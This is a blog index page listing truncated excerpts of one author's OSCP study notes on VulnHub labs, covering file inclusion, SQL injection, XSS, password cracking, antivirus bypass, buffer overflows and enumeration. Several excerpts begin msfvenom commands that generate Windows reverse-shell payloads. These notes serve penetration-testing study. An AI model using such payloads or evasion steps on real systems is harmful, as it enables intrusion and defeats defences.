随笔分类 -  艺术

上一页 1 2 3 4 5 6 7 8 9 ··· 16 下一页
摘要:OSCP Security Technology - Local File Inclusion(LFI) PHP include and post exploitation https://www.vulnhub.com/entry/pentester-lab-php-include-and-pos 阅读全文
posted @ 2021-08-14 23:32 晨风_Eric 阅读(124) 评论(0) 推荐(0)
摘要:OSCP Security Technology - SQL Injection(SQLi) Installing XSS & MySQL FILE https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ Exploit 阅读全文
posted @ 2021-08-14 18:03 晨风_Eric 阅读(69) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Cross-Site Scripting(XSS) Installing XSS & MySQL FILE https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ Ex 阅读全文
posted @ 2021-08-08 18:02 晨风_Eric 阅读(71) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Pre-Exploit Password Attacks Tools 1) ncrack kali@kali:~$ ncrack Ncrack 0.7 ( http://ncrack.org ) Usage: ncrack [Options] { 阅读全文
posted @ 2021-08-07 23:30 晨风_Eric 阅读(115) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Antivirus Bypassing Detection Platform: https://www.virustotal.com/gui/ Shell1 msfvenom -p windows/shell_reverse_tcp LHOST= 阅读全文
posted @ 2021-08-07 22:39 晨风_Eric 阅读(44) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Java Applet Attack Prepare a target virtual machine - IE11 on Win 7. Set the security level of IE to low, and add a excepti 阅读全文
posted @ 2021-08-07 21:18 晨风_Eric 阅读(51) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Client Side Attacks Tool: setoolkit setoolkit S1 --> 1) Social-Engineering Attacks S2 --> 2) Website Attack Vectors S3 --> 阅读全文
posted @ 2021-08-07 18:12 晨风_Eric 阅读(61) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Modifying Shellcode Generate a shellcode with msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.24 LPORT=4444 阅读全文
posted @ 2021-07-10 09:50 晨风_Eric 阅读(52) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Compiling an Exploit Search "samba 2.2.1a exploit". Download the source code file from the following website. https://www.e 阅读全文
posted @ 2021-07-07 19:00 晨风_Eric 阅读(44) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Generating Shellcode& Gaining Root Generating shellcode.(Note: LHOST is Kali Linux's IP) msfvenom -p windows/shell_reverse_ 阅读全文
posted @ 2021-06-27 20:29 晨风_Eric 阅读(60) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Finding the Right Module Download Mona module and set immunity debugger configuration. https://github.com/corelan/mona Open 阅读全文
posted @ 2021-06-27 19:44 晨风_Eric 阅读(58) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Finding Bad Characters Finding bad characters with immunity debugger. nano badchars.py chmod 777 badchars.py #!/usr/bin/pyt 阅读全文
posted @ 2021-06-27 18:55 晨风_Eric 阅读(110) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Finding the Offset Create and copy pattern. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 Create 阅读全文
posted @ 2021-06-26 23:54 晨风_Eric 阅读(282) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Fuzzing Download vulnserver from the grey corner website. https://thegreycorner.com/vulnserver.html Download immunity debug 阅读全文
posted @ 2021-06-26 23:04 晨风_Eric 阅读(65) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Buffer Overflows Anatomy of Memory Anatomy of the Stack 阅读全文
posted @ 2021-06-19 21:06 晨风_Eric 阅读(49) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Netcat Netcat Download Netcat for windows from following website. https://eternallybored.org/misc/netcat/ nc -nv 192.168.2. 阅读全文
posted @ 2021-06-19 20:42 晨风_Eric 阅读(58) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Enumeration(3) DNS Enumeration host -t ns zonetransfer.me host -t mx zonetransfer.me host zonetransfer.me host -l zonetrans 阅读全文
posted @ 2021-06-19 14:24 晨风_Eric 阅读(174) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Enumeration(2) SMB Enumeration We found the tcp port 111 is open from the scanning result. locate smb.conf nano /etc/samba/ 阅读全文
posted @ 2021-06-19 13:46 晨风_Eric 阅读(210) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Enumeration(1) Install Kioptrix Level 1 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ Find the IP address of Kioptri 阅读全文
posted @ 2021-06-15 22:45 晨风_Eric 阅读(62) 评论(0) 推荐(0)
摘要:OSCP Security Technology - Network Scanning(2) Scanning with Nessus https://www.tenable.com/downloads/nessus?loginAttempted=true#nessus-8.14.0 sudo dp 阅读全文
posted @ 2021-06-14 18:25 晨风_Eric 阅读(46) 评论(0) 推荐(0)

上一页 1 2 3 4 5 6 7 8 9 ··· 16 下一页